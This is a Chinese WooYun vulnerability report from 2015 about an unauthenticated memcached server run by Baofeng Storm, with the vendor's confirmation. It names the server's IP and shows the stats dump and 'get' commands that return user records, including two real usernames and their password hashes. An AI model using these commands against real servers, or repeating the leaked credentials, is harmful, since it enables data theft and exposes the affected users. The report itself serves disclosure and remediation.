当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092634

漏洞标题:暴风影音运维不当导致近百万用户数据泄漏

相关厂商:暴风影音

漏洞作者: 新一葛格

提交时间:2015-01-19 12:02

修复时间:2015-03-05 12:04

公开时间:2015-03-05 12:04

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-19: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向核心白帽子及相关领域专家公开
2015-02-08: 细节向普通白帽子公开
2015-02-18: 细节向实习白帽子公开
2015-03-05: 细节向公众公开

简要描述:

暴风影音运维不当导致近百万用户数据泄漏

详细说明:

memcached 未授权访问
ip 58.83.217.204
各位看官自己看一下咯~

漏洞证明:

STAT items:1:number 80
STAT items:1:age 73154
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:2:number 3704912
STAT items:2:age 9345840
STAT items:2:evicted 2284837
STAT items:2:evicted_nonzero 0
STAT items:2:evicted_time 5884291
STAT items:2:outofmemory 0
STAT items:2:tailrepairs 0
STAT items:2:reclaimed 0
STAT items:2:expired_unfetched 0
STAT items:2:evicted_unfetched 952183
STAT items:3:number 6898
STAT items:3:age 4122585
STAT items:3:evicted 1514
STAT items:3:evicted_nonzero 0
STAT items:3:evicted_time 11107689
STAT items:3:outofmemory 0
STAT items:3:tailrepairs 0
STAT items:3:reclaimed 0
STAT items:3:expired_unfetched 0
STAT items:3:evicted_unfetched 632
STAT items:4:number 2
STAT items:4:age 1897539
STAT items:4:evicted 0
STAT items:4:evicted_nonzero 0
STAT items:4:evicted_time 0
STAT items:4:outofmemory 0
STAT items:4:tailrepairs 0
STAT items:4:reclaimed 0
STAT items:4:expired_unfetched 0
STAT items:4:evicted_unfetched 0
STAT items:5:number 908752
STAT items:5:age 12016993
STAT items:5:evicted 648968
STAT items:5:evicted_nonzero 0
STAT items:5:evicted_time 11484419
STAT items:5:outofmemory 0
STAT items:5:tailrepairs 0
STAT items:5:reclaimed 0
STAT items:5:expired_unfetched 0
STAT items:5:evicted_unfetched 140360
STAT items:6:number 1741742
STAT items:6:age 14330310
STAT items:6:evicted 2075820
STAT items:6:evicted_nonzero 0
STAT items:6:evicted_time 9130996
STAT items:6:outofmemory 0
STAT items:6:tailrepairs 0
STAT items:6:reclaimed 0
STAT items:6:expired_unfetched 0
STAT items:6:evicted_unfetched 437638
STAT items:7:number 2113018
STAT items:7:age 7247455
STAT items:7:evicted 1888581
STAT items:7:evicted_nonzero 0
STAT items:7:evicted_time 16249958
STAT items:7:outofmemory 0
STAT items:7:tailrepairs 0
STAT items:7:reclaimed 0
STAT items:7:expired_unfetched 0
STAT items:7:evicted_unfetched 1241923
STAT items:8:number 288287
STAT items:8:age 7701839
STAT items:8:evicted 267813
STAT items:8:evicted_nonzero 0
STAT items:8:evicted_time 13792801
STAT items:8:outofmemory 0
STAT items:8:tailrepairs 0
STAT items:8:reclaimed 0
STAT items:8:expired_unfetched 0
STAT items:8:evicted_unfetched 165844
STAT items:9:number 12
STAT items:9:age 40278
STAT items:9:evicted 0
STAT items:9:evicted_nonzero 0
STAT items:9:evicted_time 0
STAT items:9:outofmemory 0
STAT items:9:tailrepairs 0
STAT items:9:reclaimed 0
STAT items:9:expired_unfetched 0
STAT items:9:evicted_unfetched 0
STAT items:27:number 1
STAT items:27:age 15230077
STAT items:27:evicted 0
STAT items:27:evicted_nonzero 0
STAT items:27:evicted_time 0
STAT items:27:outofmemory 0
STAT items:27:tailrepairs 0
STAT items:27:reclaimed 0
STAT items:27:expired_unfetched 0
STAT items:27:evicted_unfetched 0


items:5 有账号密码 number 908752 90多万噢
还有其他的 items 有用户的邮箱等信息

get U_ID_135601920001770866
VALUE U_ID_135601920001770866 0 149
{"user_id":"135601920001770866","username":"I_think","password":"df3aa00cae3d2cd12884f9cf9914f941","type":"0","state":"1","create_time":"1326814975"}
END
get U_ID_135601920004457300
VALUE U_ID_135601920004457300 0 150
{"user_id":"135601920004457300","username":"jennywhj","password":"946767faa752f923658586efd89840b5","type":"0","state":"1","create_time":"1335710030"}
END

修复方案:

加访问权限

版权声明:转载请注明来源 新一葛格@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-01-19 15:46

厂商回复:

感谢发现并提交漏洞,此机器业务已经停用很久,不过我们会尽快修复~

最新状态:

暂无